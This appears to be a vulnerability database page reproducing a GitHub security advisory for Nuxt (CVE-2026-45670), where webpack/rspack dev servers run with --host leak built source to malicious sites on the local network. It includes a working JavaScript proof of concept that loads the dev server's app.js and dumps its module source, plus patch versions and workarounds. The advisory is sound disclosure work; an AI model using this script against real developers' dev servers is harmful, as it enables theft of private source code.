Search criteria

Related vulnerabilities

GHSA-6M52-M754-PW2G

Vulnerability from github – Published: 2026-05-19 15:51 – Updated: 2026-05-19 15:51
VLAI
Summary
Nuxt: Dev server exposes built source over LAN to malicious sites (incomplete fix for GHSA-4gf7-ff8x-hq99)
Details

Summary

This is an incomplete fix for GHSA-4gf7-ff8x-hq99. Source code may be stolen during dev when using the webpack / rspack builder if the dev server is bound to a non-loopback address (e.g. nuxt dev --host) and the developer opens a malicious site on the same network.

Details

The fix for GHSA-4gf7-ff8x-hq99 relied on Sec-Fetch-Mode and Sec-Fetch-Site headers. Because these headers are sent by the browsers only for potentially trustworthy origins, the check is able to bypass for non-potentially trustworthy origins.

Since the attack requires the website to be accessible via a non-potentially trustworthy origin, only apps that are using --host is affected.

PoC

  1. Create a nuxt project with webpack / rspack builder.
  2. Run npm run dev
  3. Open http://localhost:3000
  4. Run the script below in a web site that has a different origin.
  5. You can see the source code output in the document and the devtools console.
const script = document.createElement('script')
script.src = 'http://192.168.0.31:3000/_nuxt/app.js' // NOTE: replace with the IP address the dev server listens to
script.addEventListener('load', () => {
  const key = Object.keys(window).find(k => k.startsWith("webpackChunk"))
  for (const page in window[key]) {
    const moduleList = window[key][page][1]
    console.log(moduleList)

    for (const key in moduleList) {
      const p = document.createElement('p')
      const title = document.createElement('strong')
      title.textContent = key
      const code = document.createElement('code')
      code.textContent = moduleList[key].toString()
      p.append(title, ':', document.createElement('br'), code)
      document.body.appendChild(p)
    }
  }
})
document.head.appendChild(script)

(This script is the similar with GHSA-4gf7-ff8x-hq99 except for the script.src and the global variable name)

Impact

Users using webpack / rspack builder may get the source code stolen by malicious websites if it uses a predictable host and also is using --host.

This vulnerability does not affect Chrome 142+ (and other Chromium based browsers) users due to the local network access restriction feature.

Patches

Fixed in nuxt@4.4.6 and nuxt@3.21.6 by #35051. The dev-middleware same-origin check now falls back to comparing the request's Origin / Referer host against Host when Sec-Fetch-* headers are absent, closing the non-trustworthy-origin bypass.

The fix only ships for the @nuxt/webpack-builder and @nuxt/rspack-builder packages. The default Vite builder was not affected.

Workarounds

If you cannot upgrade immediately:

  • Don't use nuxt dev --host. Bind the dev server to localhost (the default) and tunnel from other devices via SSH or a reverse proxy that enforces same-origin checks.
  • Use Chrome 142+ or another Chromium-based browser that enforces local network access restrictions.
  • Switch to the Vite builder for development.
Severity
5.9 (Medium)
CVSS:4.0/AV:A/AC:H/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.21.5"
      },
      "package": {
        "ecosystem": "npm",
        "name": "@nuxt/rspack-builder"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.15.4"
            },
            {
              "fixed": "3.21.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 4.4.5"
      },
      "package": {
        "ecosystem": "npm",
        "name": "@nuxt/rspack-builder"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.0.0-alpha.1"
            },
            {
              "fixed": "4.4.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.21.5"
      },
      "package": {
        "ecosystem": "npm",
        "name": "@nuxt/webpack-builder"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.15.4"
            },
            {
              "fixed": "3.21.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 4.4.5"
      },
      "package": {
        "ecosystem": "npm",
        "name": "@nuxt/webpack-builder"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.0.0-alpha.1"
            },
            {
              "fixed": "4.4.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-45670"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-749"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-19T15:51:14Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Summary\nThis is an incomplete fix for [GHSA-4gf7-ff8x-hq99](https://github.com/nuxt/nuxt/security/advisories/GHSA-4gf7-ff8x-hq99). Source code may be stolen during dev when using the webpack / rspack builder if the dev server is bound to a non-loopback address (e.g. `nuxt dev --host`) and the developer opens a malicious site on the same network.\n\n### Details\nThe fix for [GHSA-4gf7-ff8x-hq99](https://github.com/nuxt/nuxt/security/advisories/GHSA-4gf7-ff8x-hq99) relied on Sec-Fetch-Mode and Sec-Fetch-Site headers. Because [these headers are sent by the browsers only for potentially trustworthy origins](https://w3c.github.io/webappsec-fetch-metadata/#sec-fetch-site-header:~:text=Site%20header%20for%20a%20request%20r%3A-,Assert%3A%20r%E2%80%99s%20url%20is%20a%20potentially%20trustworthy%20URL.,-Let%20header%20be%20a%20Structured%20Field%20whose), the check is able to bypass for non-potentially trustworthy origins.\n\nSince the attack requires the website to be accessible via a non-potentially trustworthy origin, only apps that are using `--host` is affected.\n\n### PoC\n1. Create a nuxt project with webpack / rspack builder.\n1. Run `npm run dev`\n1. Open `http://localhost:3000`\n1. Run the script below in a web site that has a different origin.\n1. You can see the source code output in the document and the devtools console.\n\n```js\nconst script = document.createElement(\u0027script\u0027)\nscript.src = \u0027http://192.168.0.31:3000/_nuxt/app.js\u0027 // NOTE: replace with the IP address the dev server listens to\nscript.addEventListener(\u0027load\u0027, () =\u003e {\n  const key = Object.keys(window).find(k =\u003e k.startsWith(\"webpackChunk\"))\n  for (const page in window[key]) {\n    const moduleList = window[key][page][1]\n    console.log(moduleList)\n\n    for (const key in moduleList) {\n      const p = document.createElement(\u0027p\u0027)\n      const title = document.createElement(\u0027strong\u0027)\n      title.textContent = key\n      const code = document.createElement(\u0027code\u0027)\n      code.textContent = moduleList[key].toString()\n      p.append(title, \u0027:\u0027, document.createElement(\u0027br\u0027), code)\n      document.body.appendChild(p)\n    }\n  }\n})\ndocument.head.appendChild(script)\n```\n(This script is the similar with [GHSA-4gf7-ff8x-hq99](https://github.com/nuxt/nuxt/security/advisories/GHSA-4gf7-ff8x-hq99) except for the `script.src` and the global variable name)\n\n### Impact\nUsers using webpack / rspack builder may get the source code stolen by malicious websites if it uses a predictable host and also is using `--host`.\n\nThis vulnerability does not affect Chrome 142+ (and other Chromium based browsers) users due to [the local network access restriction feature](https://developer.chrome.com/release-notes/142#local_network_access_restrictions).\n\n### Patches\nFixed in `nuxt@4.4.6` and `nuxt@3.21.6` by [#35051](https://github.com/nuxt/nuxt/pull/35051). The dev-middleware same-origin check now falls back to comparing the request\u0027s `Origin` / `Referer` host against `Host` when `Sec-Fetch-*` headers are absent, closing the non-trustworthy-origin bypass.\n\nThe fix only ships for the `@nuxt/webpack-builder` and `@nuxt/rspack-builder` packages. The default Vite builder was not affected.\n\n### Workarounds\nIf you cannot upgrade immediately:\n\n- Don\u0027t use `nuxt dev --host`. Bind the dev server to `localhost` (the default) and tunnel from other devices via SSH or a reverse proxy that enforces same-origin checks.\n- Use Chrome 142+ or another Chromium-based browser that enforces [local network access restrictions](https://developer.chrome.com/release-notes/142#local_network_access_restrictions).\n- Switch to the Vite builder for development.",
  "id": "GHSA-6m52-m754-pw2g",
  "modified": "2026-05-19T15:51:14Z",
  "published": "2026-05-19T15:51:14Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/nuxt/nuxt/security/advisories/GHSA-6m52-m754-pw2g"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nuxt/nuxt/pull/35051"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/nuxt/nuxt"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:A/AC:H/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Nuxt: Dev server exposes built source over LAN to malicious sites (incomplete fix for GHSA-4gf7-ff8x-hq99)"
}